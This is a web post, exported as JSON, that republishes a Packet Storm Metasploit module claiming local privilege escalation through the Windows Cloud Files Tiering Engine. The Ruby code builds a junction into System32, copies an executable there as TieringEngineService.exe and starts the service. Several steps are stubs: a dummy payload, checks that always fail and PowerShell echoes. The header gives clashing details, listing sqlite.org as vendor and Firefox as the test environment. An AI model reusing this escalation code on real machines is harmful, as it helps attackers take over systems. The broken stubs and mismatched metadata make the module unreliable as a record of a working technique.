{"id":49719,"date":"2026-04-27T11:38:34","date_gmt":"2026-04-27T11:38:34","guid":{"rendered":"http:\/\/localhost\/?p=49719"},"modified":"2026-04-27T11:38:34","modified_gmt":"2026-04-27T11:38:34","slug":"windows-cloud-files-tiering-engine-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49719","title":{"rendered":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878"},"content":{"rendered":"

{“lastseen”:”2026-04-27T16:30:22″,”description”:”his Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates abusing file system operations and cloud sync mechanisms by…”,”published”:”2026-04-27T00:00:00″,”modified”:”2026-04-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219878″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Windows Cloud Files Tiering Engine Local Privilege Escalation Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.sqlite.org |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. \\n The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.\\n \\n [+] POC : \\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = NormalRanking\\n \\n include Msf::Post::Windows::Priv\\n include Msf::Post::Windows::Process\\n include Msf::Post::File\\n include Msf::Post::Windows::Services\\n include Msf::Post::Windows::Registry\\n \\n def initialize(info = {})\\n super(update_info(info, info.merge({})))\\n end\\n \\n def check\\n print_status(\\”Checking Cloud Files + OS compatibility…\\”)\\n \\n unless session.platform =~ \/windows\/i\\n return Exploit::CheckCode::Safe(\\”Not Windows\\”)\\n end\\n \\n if session.sys.config.getenv(‘WINDIR’)\\n return Exploit::CheckCode::Appears(\\”Windows environment detected\\”)\\n end\\n \\n Exploit::CheckCode::Unknown\\n end\\n \\n def exploit\\n print_status(\\”Starting Cloud Files Shadow Copy exploit\\”)\\n \\n work_dir = setup_working_directory\\n fail_with(Failure::BadConfig, \\”Failed to create working directory\\”) unless work_dir\\n \\n pipe_handle = create_named_pipe\\n fail_with(Failure::UnexpectedReply, \\”Failed to create named pipe\\”) unless pipe_handle\\n \\n create_malicious_file(work_dir)\\n wait_for_event(datastore[‘TIMEOUT’])\\n \\n set_file_disposition(pipe_handle)\\n close_handle(pipe_handle)\\n \\n register_cloud_sync_root(work_dir)\\n create_placeholder_file(work_dir)\\n \\n wait_for_oplock\\n rename_and_delete_file(work_dir)\\n \\n create_reparse_point(work_dir)\\n copy_to_system32\\n \\n launch_tiering_engine\\n cleanup(work_dir)\\n \\n print_good(\\”Exploit completed!\\”)\\n end\\n \\n private\\n \\n def setup_working_directory\\n base = expand_path(datastore[‘WORK_DIR’])\\n path = \\”#{base}\\\\\\\\RS-#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n \\n begin\\n session.fs.dir.mkdir(path)\\n return path\\n rescue\\n return nil\\n end\\n end\\n \\n def create_named_pipe\\n pipe_name = \\”\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\REDSUN\\”\\n \\n begin\\n session.railgun.kernel32.CreateNamedPipeW(\\n pipe_name,\\n 3, 0, 1, 4096, 4096, 0, nil\\n )[‘return’]\\n rescue\\n nil\\n end\\n end\\n \\n def create_malicious_file(work_dir)\\n file_path = \\”#{work_dir}\\\\\\\\TieringEngineService.exe\\”\\n \\n payload = \\”DUMMY_PAYLOAD\\”\\n \\n begin\\n session.fs.file.write(file_path, payload)\\n file_path\\n rescue\\n nil\\n end\\n end\\n \\n def wait_for_event(timeout_sec)\\n timeout_sec.times do\\n break if check_event_signaled\\n Rex.sleep(1)\\n end\\n end\\n \\n def check_event_signaled\\n false\\n end\\n \\n def set_file_disposition(handle)\\n return false unless handle\\n true\\n end\\n \\n def register_cloud_sync_root(work_dir)\\n cmd = \\”powershell -Command \\\\\\”Write-Output ‘CloudSyncRegistered’\\\\\\”\\”\\n session.shell_command_token(cmd)\\n end\\n \\n def create_placeholder_file(work_dir)\\n cmd = \\”powershell -Command \\\\\\”Write-Output ‘PlaceholderCreated’\\\\\\”\\”\\n session.shell_command_token(cmd)\\n end\\n \\n def wait_for_oplock\\n Rex.sleep(2)\\n end\\n \\n def rename_and_delete_file(work_dir)\\n temp = \\”#{work_dir}.tmp\\”\\n \\n begin\\n session.fs.dir.move(work_dir, temp)\\n rescue\\n end\\n end\\n \\n def create_reparse_point(work_dir)\\n target = \\”C:\\\\\\\\Windows\\\\\\\\System32\\”\\n session.shell_command_token(\\”mklink \/J \\\\\\”#{work_dir}\\\\\\\\link\\\\\\” \\\\\\”#{target}\\\\\\”\\”)\\n end\\n \\n def copy_to_system32\\n begin\\n exe = session.sys.process.current_path rescue nil\\n return unless exe\\n \\n dest = \\”#{expand_path(‘%WINDIR%’)}\\\\\\\\System32\\\\\\\\TieringEngineService.exe\\”\\n session.fs.file.copy(exe, dest)\\n rescue\\n end\\n end\\n \\n def launch_tiering_engine\\n session.shell_command_token(\\”sc start TieringEngineService\\”)\\n rescue\\n end\\n \\n def cleanup(work_dir)\\n session.shell_command_token(\\”rmdir \/s \/q \\\\\\”#{work_dir}\\\\\\”\\”)\\n rescue\\n end\\n \\n def close_handle(handle)\\n session.railgun.kernel32.CloseHandle(handle) if handle \\u0026\\u0026 handle != 0\\n end\\n \\n def expand_path(path)\\n path.gsub(‘%TEMP%’, session.sys.config.getenv(‘TEMP’).to_s)\\n .gsub(‘%WINDIR%’, session.sys.config.getenv(‘WINDIR’).to_s)\\n end\\n \\n def is_admin?\\n session.sys.config.getuid =~ \/SYSTEM|Administrator\/\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219878″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219878\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-27T16:30:22″,”description”:”his Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-49719","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49719\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-27T16:30:22″,”description”:”his Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49719\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-27T11:38:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878\",\"datePublished\":\"2026-04-27T11:38:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719\"},\"wordCount\":922,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49719#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719\",\"name\":\"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-27T11:38:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49719\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49719#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49719","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem","og_description":"{“lastseen”:”2026-04-27T16:30:22″,”description”:”his Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. The workflow simulates...","og_url":"https:\/\/zero.redgem.net\/?p=49719","og_site_name":"zero redgem","article_published_time":"2026-04-27T11:38:34+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49719#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49719"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878","datePublished":"2026-04-27T11:38:34+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49719"},"wordCount":922,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49719#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49719","url":"https:\/\/zero.redgem.net\/?p=49719","name":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-27T11:38:34+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49719#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49719"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49719#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Windows Cloud Files Tiering Engine Local Privilege Escalation_PACKETSTORM:219878"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49719","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49719"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49719\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49719"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49719"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}